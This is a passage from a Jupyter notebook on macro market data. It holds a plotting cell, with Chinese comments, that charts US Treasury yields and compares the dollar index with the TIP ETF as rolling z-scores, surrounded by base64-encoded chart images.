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", + "text/plain": [ + "
" + ] + }, + "metadata": {}, + "output_type": "display_data" + } + ], + "source": [ + "# --- Macro detail charts ---\n", + "# 图1:利率组(IRX/FVX/TNX/TYX)放在同一张图,便于看期限结构与方向一致性\n", + "rates = m[[\"^IRX\", \"^FVX\", \"^TNX\", \"^TYX\"]].dropna().copy()\n", + "\n", + "fig, axes = plt.subplots(2, 1, figsize=(12, 8), sharex=True)\n", + "\n", + "axes[0].plot(rates.index, rates[\"^IRX\"], label=\"IRX (3M)\", linewidth=1.5)\n", + "axes[0].plot(rates.index, rates[\"^FVX\"], label=\"FVX (5Y)\", linewidth=1.4)\n", + "axes[0].plot(rates.index, rates[\"^TNX\"], label=\"TNX (10Y)\", linewidth=1.4)\n", + "axes[0].plot(rates.index, rates[\"^TYX\"], label=\"TYX (30Y)\", linewidth=1.4)\n", + "axes[0].set_title(\"Rate Cluster: IRX / FVX / TNX / TYX\")\n", + "axes[0].set_ylabel(\"Yield Level\")\n", + "axes[0].legend(loc=\"upper left\", ncol=2)\n", + "\n", + "# 图2:DXY 与 TIP 量纲不同,先做 z-score 标准化再同图比较趋势\n", + "pair = m[[\"DX-Y.NYB\", \"TIP\"]].dropna().copy()\n", + "pair_z = (pair - pair.rolling(252, min_periods=60).mean()) / pair.rolling(252, min_periods=60).std()\n", + "\n", + "axes[1].plot(pair_z.index, pair_z[\"DX-Y.NYB\"], label=\"DXY (z-score)\", linewidth=1.5)\n", + "axes[1].plot(pair_z.index, pair_z[\"TIP\"], label=\"TIP (z-score)\", linewidth=1.5)\n", + "axes[1].axhline(0, color=\"#64748b\", linestyle=\"--\", linewidth=1)\n", + "axes[1].set_title(\"Liquidity Pair (Normalized): DXY vs TIP\")\n", + "axes[1].set_ylabel(\"Rolling z-score\")\n", + "axes[1].legend(loc=\"upper left\")\n", + "\n", + "plt.tight_layout()\n", + "plt.show()" + ] + }, + { + "cell_type": "code", + "execution_count": 8, + "id": "9f6008ff", + "metadata": {}, + "outputs": [ + { + "data": { + "image/png": "iVBORw0KGgoAAAANSUhEUgAAA88AAAF2CAYAAABQ0apXAAAAOnRFWHRTb2Z0d2FyZQBNYXRwbG90bGliIHZlcnNpb24zLjEwLjAsIGh0dHBzOi8vbWF0cGxvdGxpYi5vcmcvlHJYcgAAAAlwSFlzAAAPYQAAD2EBqD+naQABAABJREFUeJzsXQeYJUXxrxc25729HMgcOUclC5KTkhEEJIgICMIfUJQkkoOAApIliyRBQBCQHCUfcHdcznd7tzm/8P+qZ3qmpqd78nsbbn5897H7dt6k7q6u8KuqRD6fz0OMGDFixIgRI0aMGDFixIgRQ4mk+k8xYsSIESNGjBgxYsSIESNGDERsPMeIESNGjBgxYsSIESNGjBguiI3nGDFixIgRI0aMGDFixIgRwwWx8RwjRowYMWLEiBEjRowYMWK4IDaeY8SIESNGjBgxYsSIESNGDBfExnOMGDFixIgRI0aMGDFixIjhgth4jhEjRowYMWLEiBEjRowYMVwQG88xYsSIESNGjBgxYsSIESOGC2LjOUaMGDFixFhNkc/nB/sWYsSIESNGjGGD2HiOESNGjCLiuOOOg6lTp8JRRx2lPOacc85hx1x44YUw1PG///0Pfv7zn8P2228Pm2yyCey2227wm9/8BhYsWADDBffeey+cd955xu/9/f1w4403smfZbLPN4KCDDoIXXnjB9Tw4XnvssUfo+1m4cCEb/6eeeor9/sEHH7Df8f9R4oknnoBrrrkGRgoK9Z5wTIu1FvH+b731VuXzXHfddbDddtvBFltsAc8880xk94ZzDa+Fcw/xj3/8A0499dTQ540RI0aMkYb0YN9AjBgxYqxuSCaT8Nlnn8HSpUth3Lhxlr91d3fD66+/DsMB7733Hpx88smw1157wZVXXgk1NTUwf/58ZowedthhzDibMmUKDGXMmjUL7rzzTvjnP/9pfIaG9DvvvAO//vWvYc0114Rnn30Wzj33XKiuroZddtlFea5f/OIXcPzxx0d+jxtvvDE8/vjjsO6660Z63ttvv50ZYjGccdttt7GxLzbEcZ8xYwbcfffdcMQRR8DBBx8Ma6+9Nqy//voFubcf//jH8PDDDzMjGtdyjBgxYsTQEBvPMWLEiFFkbLTRRvDdd9/BSy+9BCeccILlb2g4V1RUQG1tLQx13HHHHSwye/PNNxufYQR61113ZQb1fffdB5dccgkMZWAk74ADDoCxY8ey3z/++GP497//DX/961/ZcyB23HFHmDdvHrz55puOxnOhHAVoHGGkMcbgrdfBgDjura2t7P/7778/bLPNNuznxsbGglw7kUjAaaedBpdffjlbH+Xl5QW5TowYMWIMN8S07RgxYsQoMiorK5lhhsazCKQH77333pBOW32bq1atgssuuwx23313Ro/GiOEZZ5xh0Cw5kMp56KGHwuabb85oxzfccAOjISOQDopGLUbS8Ps77bQTtLW1QTabZVGmAw88kBnD+L3rr78e+vr6HJ+jublZmjM7ZswYuPjii+H73/++8Rked//998O+++7LroH3cc8991i+j9HeY445BrbeemtmhGPkd8mSJRZqKRoyGNHGc+MzoBMC8Z///Ad+9KMfwaabbsr+9oc//IFF8Z2Akbz//ve/zDjgwDFBI5gbztyQeOyxx9gz+aFt48+33HILo0Z/73vfY8/9s5/9DObOnWv53ssvv8yo4fh3HLtvv/3W8ncZfReZCyeddBJstdVWsMMOO7DI+LJly4y/4zl++ctfsr9hBHPnnXdm76S3t9e4t0WLFsHTTz9toevivZ111lnsHaLhhmkGSM0XKeXoGNlnn33YPHvyySel78PLmONY4rjhtfAYjKi++OKLnsYcxwTXCn7vJz/5CSxevBiC4PnnnzfeP74vZB7Qd0mp0fz5cZ4g0wDvG8f2L3/5C3R2drKUBZy/+Bk6Zviz8u/961//YmkOfH3++c9/hlwuJ70vOu64dnEsED/96U+NeSbStnHNXnvttWz+opzANS2mHOD18H7x+ngf+BwoB0SgrMHzqcY3RowYMVZHxMZzjBgxYgwC9ttvP4O6zYHKN0Y